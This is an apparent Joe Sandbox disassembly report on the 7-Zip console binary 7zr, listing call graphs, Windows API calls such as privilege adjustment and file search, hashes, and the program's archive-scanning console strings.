77135->77136 77137 3c5100 77136->77137 77138 3c50f1 77136->77138 77243 383044 malloc _CxxThrowException free ctype 77137->77243 77140 3830ea 3 API calls 77138->77140 77141 3c50fe 77140->77141 77244 391029 6 API calls 77141->77244 77143 3c511a 77144 3c516b 77143->77144 77145 3c5120 77143->77145 77251 39089e malloc _CxxThrowException free _CxxThrowException memcpy 77144->77251 77245 381e40 free 77145->77245 77148 3c5187 77152 3c04d2 5 API calls 77148->77152 77149 3c5128 77246 381e40 free 77149->77246 77151 3c5130 77247 381e40 free 77151->77247 77154 3c51ba 77152->77154 77252 3c0516 malloc _CxxThrowException ctype 77154->77252 77155 3c5138 77248 381e40 free 77155->77248 77158 3c51c5 77163 3c522d 77158->77163 77164 3c51f5 77158->77164 77159 3c5140 77249 381e40 free 77159->77249 77161 3c5148 77250 381e40 free 77161->77250 77165 382e04 2 API calls 77163->77165 77253 381e40 free 77164->77253 77213 3c5235 77165->77213 77167 3c51fd 77254 381e40 free 77167->77254 77170 3c5205 77255 381e40 free 77170->77255 77171 3c532e 77264 381e40 free 77171->77264 77174 3c520d 77256 381e40 free 77174->77256 77175 3c5347 77175->77112 77177 3c5358 77175->77177 77265 381e40 free 77177->77265 77178 3c5215 77257 381e40 free 77178->77257 77180 3c53a3 77271 381e40 free 77180->77271 77182 3c5360 77266 381e40 free 77182->77266 77183 3c521d 77258 381e40 free 77183->77258 77187->76967 77188 3c5368 77267 381e40 free 77188->77267 77191 3c53bc 77272 381e40 free 77191->77272 77192 3c5370 77268 381e40 free 77192->77268 77196 3c53c4 77273 381e40 free 77196->77273 77197 3c04d2 5 API calls 77197->77213 77198 3c5378 77200 3c53cc 77274 381e40 free 77200->77274 77206 3c53d4 77275 381e40 free 77206->77275 77208 3c53dc 77213->77171 77213->77180 77213->77197 77214 382e04 2 API calls 77213->77214 77259 3c545c 5 API calls 2 library calls 77213->77259 77260 391029 6 API calls 77213->77260 77261 39089e malloc _CxxThrowException free _CxxThrowException memcpy 77213->77261 77262 3c0516 malloc _CxxThrowException ctype 77213->77262 77263 381e40 free 77213->77263 77214->77213 77219 397fcf __EH_prolog 77216->77219 77217 39800a 77293 389736 VariantClear 77217->77293 77218 398061 77221 39805c 77218->77221 77235 398025 77218->77235 77219->77218 77219->77221 77222 398019 77219->77222 77226 397ff4 77219->77226 77292 389630 VariantClear 77221->77292 77225 39801e 77222->77225 77222->77226 77223 3980b8 77228 38965d VariantClear 77223->77228 77229 398042 77225->77229 77230 398022 77225->77230 77226->77217 77284 38950d 77226->77284 77232 3980c0 77228->77232 77290 389597 VariantClear 77229->77290 77233 398032 77230->77233 77230->77235 77232->77089 77232->77090 77289 389604 VariantClear 77233->77289 77235->77217 77291 3895df VariantClear 77235->77291 77237->77187 77238->77187 77239->77104 77240->77120 77241->77132 77242->77134 77243->77141 77244->77143 77245->77149 77246->77151 77247->77155 77248->77159 77249->77161 77250->77187 77251->77148 77252->77158 77253->77167 77254->77170 77255->77174 77256->77178 77257->77183 77258->77187 77259->77213 77260->77213 77261->77213 77262->77213 77263->77213 77264->77175 77265->77182 77266->77188 77267->77192 77268->77198 77271->77191 77272->77196 77273->77200 77274->77206 77275->77208 77278->77114 77279->77116 77280->77121 77281->77125 77282->77129 77283->77187 77294 389767 77284->77294 77286 389518 SysAllocStringLen 77287 389539 _CxxThrowException 77286->77287 77288 38954f 77286->77288 77287->77288 77288->77217 77289->77217 77290->77217 77291->77217 77292->77217 77293->77223 77295 389779 77294->77295 77296 389770 77294->77296 77299 389686 VariantClear 77295->77299 77296->77286 77298 389780 77298->77286 77299->77298 77301 3d151b __EH_prolog 77300->77301 77307 3d10d3 77301->77307 77304 3d1589 77304->77063 77305 3d1552 _CxxThrowException 77305->77063 77306->77065 77308 3d10dd __EH_prolog 77307->77308 77309 3cd1b7 free 77308->77309 77314 3d10f2 77309->77314 77310 3d12ef 77310->77304 77310->77305 77311 3d11f4 77311->77310 77338 38b95a 6 API calls 77311->77338 77312 3d139e 77312->77310 77313 3d13c4 77312->77313 77315 381e0c ctype 2 API calls 77312->77315 77316 391168 10 API calls 77313->77316 77314->77310 77314->77311 77317 391168 10 API calls 77314->77317 77315->77313 77319 3d13da 77316->77319 77317->77311 77321 3d13f9 77319->77321 77331 3d13de 77319->77331 77374 3cef67 _CxxThrowException 77319->77374 77339 3cf047 77321->77339 77324 3d14ba 77378 3d0943 50 API calls 2 library calls 77324->77378 77325 3d1450 77343 3d06ae 77325->77343 77329 3d14e7 77379 3b2db9 free ctype 77329->77379 77380 381e40 free 77331->77380 77334 3d148e 77335 3cf047 _CxxThrowException 77334->77335 77336 3d14ac 77335->77336 77336->77324 77377 3cef67 _CxxThrowException 77336->77377 77338->77312 77340 3cf063 77339->77340 77341 3cf072 77340->77341 77381 3cef67 _CxxThrowException 77340->77381 77341->77324 77341->77325 77375 3cef67 _CxxThrowException 77341->77375 77344 3d06b8 __EH_prolog 77343->77344 77382 3d03f4 77344->77382 77346 3912a5 5 API calls 77371 3d0715 77346->77371 77347 3cb8dc ctype free 77348 3d08a6 77347->77348 77412 381e40 free 77348->77412 77349 3d08e3 _CxxThrowException 77351 3d08f7 77349->77351 77355 3cb8dc ctype free 77351->77355 77352 3d08ae 77413 381e40 free 77352->77413 77353 38429a 3 API calls 77353->77371 77357 3d0914 77355->77357 77356 3d08b6 77414 381e40 free 77356->77414 77416 381e40 free 77357->77416 77358 381e0c ctype 2 API calls 77358->77371 77361 3d08be 77415 3cc149 free ctype 77361->77415 77362 3d091c 77417 381e40 free 77362->77417 77365 3d08d0 77365->77329 77365->77334 77376 3cef67 _CxxThrowException 77365->77376 77366 3d0924 77418 381e40 free 77366->77418 77368 3c81ec 29 API calls 77368->77371 77369 3d092c 77419 3cc149 free ctype 77369->77419 77371->77346 77371->77349 77371->77351 77371->77353 77371->77358 77371->77368 77372 3d0877 77371->77372 77373 3cef67 _CxxThrowException 77371->77373 77372->77347 77373->77371 77374->77321 77375->77325 77376->77334 77377->77324 77378->77329 77379->77331 77380->77310 77381->77341 77383 3cf047 _CxxThrowException 77382->77383 77384 3d0407 77383->77384 77385 3d0475 77384->77385 77388 3cf047 _CxxThrowException 77384->77388 77386 3d049a 77385->77386 77423 3cfa3f 22 API calls 2 library calls 77385->77423 77387 3d04b8 77386->77387 77424 3d159a malloc _CxxThrowException free ctype 77386->77424 77389 3d04e8 77387->77389 77393 3d04cd 77387->77393 77390 3d0421 77388->77390 77426 3d7c4a malloc _CxxThrowException free ctype 77389->77426 77394 3d043e 77390->77394 77420 3cef67 _CxxThrowException 77390->77420 77425 3cfff0 9 API calls 2 library calls 77393->77425 77421 3cf93c 7 API calls 2 library calls 77394->77421 77396 3d0492 77397 3cf047 _CxxThrowException 77396->77397 77397->77386 77401 3d04e3 77408 3d054a 77401->77408 77428 3cef67 _CxxThrowException 77401->77428 77402 3d0446 77404 3d046d 77402->77404 77422 3cef67 _CxxThrowException 77402->77422 77403 3d04db 77405 3cf047 _CxxThrowException 77403->77405 77407 3cf047 _CxxThrowException 77404->77407 77405->77401 77406 3d04f3 77406->77401 77427 39089e malloc _CxxThrowException free _CxxThrowException memcpy 77406->77427 77407->77385 77408->77371 77412->77352 77413->77356 77414->77361 77415->77365 77416->77362 77417->77366 77418->77369 77419->77365 77420->77394 77421->77402 77422->77404 77423->77396 77424->77387 77425->77403 77426->77406 77427->77406 77428->77408

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1073 389313-389338 GetCurrentProcess OpenProcessToken 1074 38933a-38934a LookupPrivilegeValueW 1073->1074 1075 389390 1073->1075 1076 38934c-389370 AdjustTokenPrivileges 1074->1076 1077 389382 1074->1077 1078 389393-389398 1075->1078 1076->1077 1079 389372-389380 GetLastError 1076->1079 1080 389385-38938e CloseHandle 1077->1080 1079->1080 1080->1078
                        APIs
                        • GetCurrentProcess.KERNEL32(00000020,00391EC5,?,7597AB50,?,?,?,?,00391EC5,00391CEF), ref: 00389329
                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,00391EC5,00391CEF), ref: 00389330
                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeRestorePrivilege,?), ref: 00389342
                        • AdjustTokenPrivileges.KERNELBASE(00391EC5,00000000,?,00000000,00000000,00000000), ref: 00389368
                        • GetLastError.KERNEL32 ref: 00389372
                        • CloseHandle.KERNELBASE(00391EC5,?,?,?,?,00391EC5,00391CEF), ref: 00389388
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                        • String ID: SeRestorePrivilege
                        • API String ID: 3398352648-1684392131
                        • Opcode ID: a0c374470b4c93386b228be09f8d07356e2479da721f265ea30a71ff75efc764
                        • Instruction ID: c495b2537a895e0dc6ae60e20d7f2fa9f4298073e51f30bb4de246f93201f65c
                        • Opcode Fuzzy Hash: a0c374470b4c93386b228be09f8d07356e2479da721f265ea30a71ff75efc764
                        • Instruction Fuzzy Hash: 04018475A45214ABCB215FF19C89BEE7F7CEF06340F4801A5E941E2190D6B48605D7A4

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1081 393d66-393d9c call 41fb10 GetCurrentProcess call 393e04 OpenProcessToken 1086 393d9e-393dbe LookupPrivilegeValueW 1081->1086 1087 393de3-393dfe call 393e04 1081->1087 1086->1087 1088 393dc0-393dd3 AdjustTokenPrivileges 1086->1088 1088->1087 1090 393dd5-393de1 GetLastError 1088->1090 1090->1087
                        APIs
                        • __EH_prolog.LIBCMT ref: 00393D6B
                        • GetCurrentProcess.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 00393D7D
                        • OpenProcessToken.ADVAPI32(00000000,00000028,?,?,00000000,?,?,00000000,00000000,759A8E30), ref: 00393D94
                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00393DB6
                        • AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,759A8E30), ref: 00393DCB
                        • GetLastError.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 00393DD5
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: ProcessToken$AdjustCurrentErrorH_prologLastLookupOpenPrivilegePrivilegesValue
                        • String ID: SeSecurityPrivilege
                        • API String ID: 3475889169-2333288578
                        • Opcode ID: 31c176a1eb9eeb8bec16a5e3a51817108438e16762a47eb2e9d977dfbced1e87
                        • Instruction ID: 4d151035c9a791a4c3a6c7e8da24d6791a49262d88d0385553be374aea523bcd
                        • Opcode Fuzzy Hash: 31c176a1eb9eeb8bec16a5e3a51817108438e16762a47eb2e9d977dfbced1e87
                        • Instruction Fuzzy Hash: EF110CB1A41119AFDF21AFE5DCD5AFEBBBCFF04344F404529E412E2191D7748A09CA64
                        APIs
                        • __EH_prolog.LIBCMT ref: 003C81F1
                          • Part of subcall function 003CF749: _CxxThrowException.MSVCRT(?,00434A58), ref: 003CF792
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: ExceptionH_prologThrow
                        • String ID:
                        • API String ID: 461045715-3916222277
                        • Opcode ID: 7456336a28308a6474dba2585b1117fb242dd8b8f70b028f08a3160b475f55dd
                        • Instruction ID: 347a7a7edb59e5d00fa412f921d28b345782c9048930fdfdfaf76ac8de4634de
                        • Opcode Fuzzy Hash: 7456336a28308a6474dba2585b1117fb242dd8b8f70b028f08a3160b475f55dd
                        • Instruction Fuzzy Hash: 65927C31900249DFDB16DFA8C844FAEBBB5BF09304F25449DE805EB292CB75AE45CB61
                        APIs
                        • __EH_prolog.LIBCMT ref: 0038686D
                          • Part of subcall function 00386848: FindClose.KERNELBASE(00000000,?,00386880), ref: 00386853
                        • FindFirstFileW.KERNELBASE(?,-00000268,?,00000000), ref: 003868A5
                        • FindFirstFileW.KERNELBASE(?,-00000268,00000000,?,00000000), ref: 003868DE
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: Find$FileFirst$CloseH_prolog
                        • String ID:
                        • API String ID: 3371352514-0
                        • Opcode ID: 12da1922dce87b6b6c2a41fd7863d79cbd53d112b08385b6e8b479404d5cef55
                        • Instruction ID: 862488cd7e513a42033753c9e9d2832d88aff9defb740f6153c89ec6ebac3ab5
                        • Opcode Fuzzy Hash: 12da1922dce87b6b6c2a41fd7863d79cbd53d112b08385b6e8b479404d5cef55
                        • Instruction Fuzzy Hash: 5511DD315003099BCF22FF64D8929EDB778EF50324F2042A9E9A49B191DB319E86DB40

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 0 3ba013-3ba01a 1 3ba37a-3ba544 call 3c04d2 call 381524 call 3c04d2 call 381524 call 381e0c 0->1 2 3ba020-3ba02d call 391ac8 0->2 64 3ba551 1->64 65 3ba546-3ba54f call 3bb0fa 1->65 8 3ba22e-3ba235 2->8 9 3ba033-3ba03a 2->9 13 3ba23b-3ba24d call 3bb4f6 8->13 14 3ba367-3ba375 call 3bb55f 8->14 11 3ba03c-3ba042 9->11 12 3ba054-3ba089 call 3b92d3 9->12 11->12 16 3ba044-3ba04f call 3830ea 11->16 28 3ba08b-3ba091 12->28 29 3ba099 12->29 25 3ba259-3ba2fb call 3a7ebb call 3827bb call 3826dd call 3a3d70 call 3bad99 call 3827bb 13->25 26 3ba24f-3ba253 13->26 30 3bac23-3bac2a 14->30 16->12 94 3ba2fd 25->94 95 3ba303-3ba362 call 3bb6ab call 3b2db9 call 381e40 * 2 call 3bbff8 25->95 26->25 28->29 33 3ba093-3ba097 28->33 34 3ba09d-3ba0de call 382fec call 3bb369 29->34 35 3bac3a-3bac66 call 3bb96d call 381e40 call 3a3247 30->35 36 3bac2c-3bac33 30->36 33->34 58 3ba0ea-3ba0fa 34->58 59 3ba0e0-3ba0e4 34->59 68 3bac68-3bac6a 35->68 69 3bac6e-3bacb5 call 381e40 call 3811c2 call 3bbe0c call 3b2db9 35->69 36->35 40 3bac35 36->40 46 3bac35 call 3bb988 40->46 46->35 60 3ba10d 58->60 61 3ba0fc-3ba102 58->61 59->58 67 3ba114-3ba19e call 382fec call 3a7ebb call 3bad99 60->67 61->60 66 3ba104-3ba10b 61->66 72 3ba553-3ba55c 64->72 65->72 66->67 103 3ba1a2 call 3af8e0 67->103 68->69 73 3ba55e-3ba560 72->73 74 3ba564-3ba5c1 call 382fec call 3bb277 72->74 73->74 97 3ba5cd-3ba652 call 3bad06 call 3bbf3e call 393a29 call 382e04 call 3a4345 74->97 98 3ba5c3-3ba5c7 74->98 94->95 95->30 136 3ba676-3ba6c8 call 3a2096 97->136 137 3ba654-3ba671 call 3a375c call 3bb96d 97->137 98->97 107 3ba1a7-3ba1b1 103->107 112 3ba1b3-3ba1bb call 3bc7d7 107->112 113 3ba1c0-3ba1c9 107->113 112->113 114 3ba1cb 113->114 115 3ba1d1-3ba229 call 3bb6ab call 3b2db9 call 381e40 call 3bbfa4 call 3b940b 113->115 114->115 115->30 143 3ba6cd-3ba6d6 136->143 137->136 146 3ba6d8-3ba6dd call 3bc7d7 143->146 147 3ba6e2-3ba6e5 143->147 146->147 150 3ba72e-3ba73a 147->150 151 3ba6e7-3ba6ee 147->151 152 3ba79e-3ba7aa 150->152 153 3ba73c-3ba74a call 381fa0 150->153 154 3ba722-3ba725 151->154 155 3ba6f0-3ba71d call 381fa0 fputs call 381fa0 call 381fb3 call 381fa0 151->155 156 3ba7d9-3ba7e5 152->156 157 3ba7ac-3ba7b2 152->157 170 3ba74c-3ba753 153->170 171 3ba755-3ba799 fputs call 382201 call 381fa0 fputs call 382201 call 381fa0 153->171 154->150 158 3ba727 154->158 155->154 164 3ba818-3ba81a 156->164 165 3ba7e7-3ba7ed 156->165 157->156 162 3ba7b4-3ba7d4 fputs call 382201 call 381fa0 157->162 158->150 162->156 167 3ba899-3ba8a5 164->167 168 3ba81c-3ba82b 164->168 165->167 172 3ba7f3-3ba813 fputs call 382201 call 381fa0 165->172 173 3ba8e9-3ba8ed 167->173 174 3ba8a7-3ba8ad 167->174 176 3ba82d-3ba84c fputs call 382201 call 381fa0 168->176 177 3ba851-3ba85d 168->177 170->152 170->171 171->152 172->164 181 3ba8ef 173->181 186 3ba8f6-3ba8f8 173->186 174->181 182 3ba8af-3ba8c2 call 381fa0 174->182 176->177 177->167 185 3ba85f-3ba872 call 381fa0 177->185 181->186 182->181 207 3ba8c4-3ba8e4 fputs call 382201 call 381fa0 182->207 185->167 209 3ba874-3ba894 fputs call 382201 call 381fa0 185->209 196 3baaaf-3baaeb call 3a43b3 call 381e40 call 3bc104 call 3bad82 186->196 197 3ba8fe-3ba90a 186->197 246 3bac0b-3bac1e call 3b2db9 * 2 196->246 247 3baaf1-3baaf7 196->247 204 3baa73-3baa89 call 381fa0 197->204 205 3ba910-3ba91f 197->205 204->196 220 3baa8b-3baaaa fputs call 382201 call 381fa0 204->220 205->204 211 3ba925-3ba929 205->211 207->173 209->167 211->196 217 3ba92f-3ba93d 211->217 223 3ba96a-3ba971 217->223 224 3ba93f-3ba964 fputs call 382201 call 381fa0 217->224 220->196 226 3ba98f-3ba9a8 fputs call 382201 223->226 227 3ba973-3ba97a 223->227 224->223 241 3ba9ad-3ba9bd call 381fa0 226->241 227->226 234 3ba97c-3ba982 227->234 234->226 239 3ba984-3ba98d 234->239 239->226 244 3baa06-3baa1f fputs call 382201 239->244 241->244 252 3ba9bf-3baa01 fputs call 382201 call 381fa0 fputs call 382201 call 381fa0 241->252 251 3baa24-3baa29 call 381fa0 244->251 246->30 247->246 258 3baa2e-3baa4b fputs call 382201 251->258 252->244 263 3baa50-3baa5b call 381fa0 258->263 263->196 269 3baa5d-3baa71 call 381fa0 call 3b710e 263->269 269->196
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: fputs$ExceptionThrow
                        • String ID: 7zCon.sfx$Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Size: $Sub items Errors: $Warnings: $`&D$p&D$N
                        • API String ID: 3665150552-3822028184
                        • Opcode ID: 87a31a7ce1c5c335f2706b1ed27f32bad133c43d54053d87998dc706be4a5d67
                        • Instruction ID: e79b84a1cdcd3b7acce6c799a2d603491ffbe8b13fa8f6700336de0758bf27b1
                        • Opcode Fuzzy Hash: 87a31a7ce1c5c335f2706b1ed27f32bad133c43d54053d87998dc706be4a5d67
                        • Instruction Fuzzy Hash: F4529C31A04658DFCF26EBA4C885BEDFBB5AF44308F1041DAE149AB691DB746E84CF11

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 274 3ba42c-3ba433 275 3ba449-3ba4df call 3b545d call 382e04 call 3a1858 call 381e40 274->275 276 3ba435-3ba444 fputs call 381fa0 274->276 286 3ba4ee-3ba4f1 275->286 287 3ba4e1-3ba4e9 call 3bc7d7 275->287 276->275 288 3ba50e-3ba520 call 3bc73e 286->288 289 3ba4f3-3ba4fa 286->289 287->286 295 3bac0b-3bac2a call 3b2db9 * 2 288->295 296 3ba526-3ba544 call 381e0c 288->296 289->288 291 3ba4fc-3ba509 call 3b57fb 289->291 291->288 306 3bac3a-3bac66 call 3bb96d call 381e40 call 3a3247 295->306 307 3bac2c-3bac33 295->307 304 3ba551 296->304 305 3ba546-3ba54f call 3bb0fa 296->305 309 3ba553-3ba55c 304->309 305->309 327 3bac68-3bac6a 306->327 328 3bac6e-3bacb5 call 381e40 call 3811c2 call 3bbe0c call 3b2db9 306->328 307->306 312 3bac35 call 3bb988 307->312 310 3ba55e-3ba560 309->310 311 3ba564-3ba5c1 call 382fec call 3bb277 309->311 310->311 325 3ba5cd-3ba652 call 3bad06 call 3bbf3e call 393a29 call 382e04 call 3a4345 311->325 326 3ba5c3-3ba5c7 311->326 312->306 348 3ba676-3ba6d6 call 3a2096 325->348 349 3ba654-3ba671 call 3a375c call 3bb96d 325->349 326->325 327->328 355 3ba6d8-3ba6dd call 3bc7d7 348->355 356 3ba6e2-3ba6e5 348->356 349->348 355->356 358 3ba72e-3ba73a 356->358 359 3ba6e7-3ba6ee 356->359 360 3ba79e-3ba7aa 358->360 361 3ba73c-3ba74a call 381fa0 358->361 362 3ba722-3ba725 359->362 363 3ba6f0-3ba71d call 381fa0 fputs call 381fa0 call 381fb3 call 381fa0 359->363 364 3ba7d9-3ba7e5 360->364 365 3ba7ac-3ba7b2 360->365 378 3ba74c-3ba753 361->378 379 3ba755-3ba799 fputs call 382201 call 381fa0 fputs call 382201 call 381fa0 361->379 362->358 366 3ba727 362->366 363->362 372 3ba818-3ba81a 364->372 373 3ba7e7-3ba7ed 364->373 365->364 370 3ba7b4-3ba7d4 fputs call 382201 call 381fa0 365->370 366->358 370->364 375 3ba899-3ba8a5 372->375 376 3ba81c-3ba82b 372->376 373->375 380 3ba7f3-3ba813 fputs call 382201 call 381fa0 373->380 381 3ba8e9-3ba8ed 375->381 382 3ba8a7-3ba8ad 375->382 384 3ba82d-3ba84c fputs call 382201 call 381fa0 376->384 385 3ba851-3ba85d 376->385 378->360 378->379 379->360 380->372 389 3ba8ef 381->389 394 3ba8f6-3ba8f8 381->394 382->389 390 3ba8af-3ba8c2 call 381fa0 382->390 384->385 385->375 393 3ba85f-3ba872 call 381fa0 385->393 389->394 390->389 415 3ba8c4-3ba8e4 fputs call 382201 call 381fa0 390->415 393->375 417 3ba874-3ba894 fputs call 382201 call 381fa0 393->417 404 3baaaf-3baaeb call 3a43b3 call 381e40 call 3bc104 call 3bad82 394->404 405 3ba8fe-3ba90a 394->405 404->295 454 3baaf1-3baaf7 404->454 412 3baa73-3baa89 call 381fa0 405->412 413 3ba910-3ba91f 405->413 412->404 428 3baa8b-3baaaa fputs call 382201 call 381fa0 412->428 413->412 419 3ba925-3ba929 413->419 415->381 417->375 419->404 425 3ba92f-3ba93d 419->425 431 3ba96a-3ba971 425->431 432 3ba93f-3ba964 fputs call 382201 call 381fa0 425->432 428->404 434 3ba98f-3ba9a8 fputs call 382201 431->434 435 3ba973-3ba97a 431->435 432->431 449 3ba9ad-3ba9bd call 381fa0 434->449 435->434 442 3ba97c-3ba982 435->442 442->434 447 3ba984-3ba98d 442->447 447->434 452 3baa06-3baa4b fputs call 382201 call 381fa0 fputs call 382201 447->452 449->452 458 3ba9bf-3baa01 fputs call 382201 call 381fa0 fputs call 382201 call 381fa0 449->458 467 3baa50-3baa5b call 381fa0 452->467 454->295 458->452 467->404 473 3baa5d-3baa71 call 381fa0 call 3b710e 467->473 473->404
                        APIs
                        • fputs.MSVCRT(Scanning the drive for archives:), ref: 003BA43E
                          • Part of subcall function 00381FA0: fputc.MSVCRT ref: 00381FA7
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: fputcfputs
                        • String ID: Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Scanning the drive for archives:$Size: $Warnings: $`&D$p&D$!"$N
                        • API String ID: 269475090-2375712579
                        • Opcode ID: e8da8417d6f8673f548414feff567211fdffe4fb2d03e58776d192c48cad4378
                        • Instruction ID: 75d7eff037681d72523a4950b93a2849140276b1e9037fd143c871e8e1968815
                        • Opcode Fuzzy Hash: e8da8417d6f8673f548414feff567211fdffe4fb2d03e58776d192c48cad4378
                        • Instruction Fuzzy Hash: BB22AE30904648DFDF2BEBA4C846BEDFBB5AF44304F10419AE549AB6A1DB746E84CF11

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 478 3b993d-3b9950 call 3bb5b1 481 3b9963-3b997e call 391f33 478->481 482 3b9952-3b995e call 381fb3 478->482 486 3b998f-3b9998 481->486 487 3b9980-3b998a 481->487 482->481 488 3b999a-3b99a6 486->488 489 3b99a8 486->489 487->486 488->489 490 3b99ab-3b99b5 488->490 489->490 491 3b99b7-3b99cc GetStdHandle GetConsoleScreenBufferInfo 490->491 492 3b99d5-3b9a04 call 381e0c call 3bacb6 490->492 491->492 493 3b99ce-3b99d2 491->493 500 3b9a0c-3b9a24 call 3a7b48 492->500 501 3b9a06-3b9a08 492->501 493->492 503 3b9a29-3b9a48 call 3bb96d call 3a7018 call 391aa4 500->503 501->500 510 3b9a4a-3b9a4c 503->510 511 3b9a7c-3b9aa8 call 3addb5 503->511 512 3b9a4e-3b9a55 510->512 513 3b9a66-3b9a77 _CxxThrowException 510->513 518 3b9aaa-3b9abb _CxxThrowException 511->518 519 3b9ac0-3b9ade 511->519 512->513 515 3b9a57-3b9a64 call 391ac8 512->515 513->511 515->511 515->513 518->519 521 3b9b3a-3b9b55 519->521 522 3b9ae0-3b9b04 call 3a7dd7 519->522 526 3b9b5c-3b9ba4 call 381fa0 fputs call 381fa0 strlen * 2 521->526 527 3b9b57 521->527 528 3b9bfa-3b9c0b _CxxThrowException 522->528 529 3b9b0a-3b9b0e 522->529 541 3b9baa-3b9be4 fputs fputc 526->541 542 3b9e25-3b9e4d call 381fa0 fputs call 381fa0 526->542 527->526 532 3b9c10 528->532 529->528 531 3b9b14-3b9b38 call 3bc077 call 381e40 529->531 531->521 531->522 535 3b9c12-3b9c25 532->535 543 3b9c27-3b9c33 535->543 544 3b9be6-3b9bf0 535->544 541->543 541->544 554 3b9f0c-3b9f34 call 381fa0 fputs call 381fa0 542->554 555 3b9e53 542->555 552 3b9c81-3b9cb1 call 3bb67d call 382e04 543->552 553 3b9c35-3b9c3d 543->553 544->532 547 3b9bf2-3b9bf8 544->547 547->535 595 3b9cb3-3b9cb7 552->595 596 3b9d10-3b9d28 call 3bb67d 552->596 556 3b9c6b-3b9c80 call 3821d8 553->556 557 3b9c3f-3b9c4a 553->557 577 3b9f3a 